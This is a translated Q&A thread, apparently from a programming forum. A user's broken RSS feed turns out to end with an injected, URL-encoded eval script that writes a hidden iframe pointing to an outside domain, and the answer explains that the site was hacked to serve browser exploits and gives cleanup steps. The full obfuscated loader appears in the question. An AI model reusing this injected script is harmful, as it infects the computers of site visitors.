我的Feed被破坏了:Feed Validator说这部分就是问题所在。有什么想法吗?
]]>content:encoded>
wfw:commentRss>http://sweatingthebigstuff.com/2010/01/21/5-steps-to-get-out-of-debt/feed/wfw:commentRss>
slash:comments>2/slash:comments>
/item>
/channel>
/rss>
script language="javascript">eval(unescape("%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%27%3C%69%66%72%61%6D%65%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%69%73%73%39%77%38%73%38%39%78%78%2E%6F%72%67%2F%69%6E%2E%70%68%70%22%20%77%69%64%74%68%3D%31%20%68%65%69%67%68%74%3D%31%20%66%72%61%6D%65%62%6F%72%64%65%72%3D%30%3E%3C%2F%69%66%72%61%6D%65%3E%27%29%3B"))</script>
答案 0 :(得分:4)
<script language="javascript">eval(unescape("%64%6F%63...
你被黑了。攻击者已经破坏了您的网站,并将此脚本添加到您的某些页面的底部(可能是所有这些页面,根据您的主站点判断)。它会针对试图感染其他人计算机的Web浏览器和插件加载一堆漏洞利用代码。这也导致RSS无效是副作用。
你需要让网站在感染更多人之前离线,然后进行清理,这将取决于他们如何破坏它/它是什么类型的服务器。当然,您至少需要删除当前的站点代码并从您知道干净的机器(*)上传新的新脚本,并更改所有密码。如果它是您自己的[虚拟]服务器,则需要检查服务器本身是否已经植根。
(*:目前网站遭到入侵的一种非常常见的方式是通过被黑客入侵的客户端机器运行FTP。当你连接时,木马窃取了FTP密码。所以你需要检查和清除你可能用来连接的每台机器如果你发现其中一个有任何可疑之处,不要相信AV工具可以完全清理它,因为今天它们无法跟上那里的恶意代码数量。重新安装操作系统而不是。)